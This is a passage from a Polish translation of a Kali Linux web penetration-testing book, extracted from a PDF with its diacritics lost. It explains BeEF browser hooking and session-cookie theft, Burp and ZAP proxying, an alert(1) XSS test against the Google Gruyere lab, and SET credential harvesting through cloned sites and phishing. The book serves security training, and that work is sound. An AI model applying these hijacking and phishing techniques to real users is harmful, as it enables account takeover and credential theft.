dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 7: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

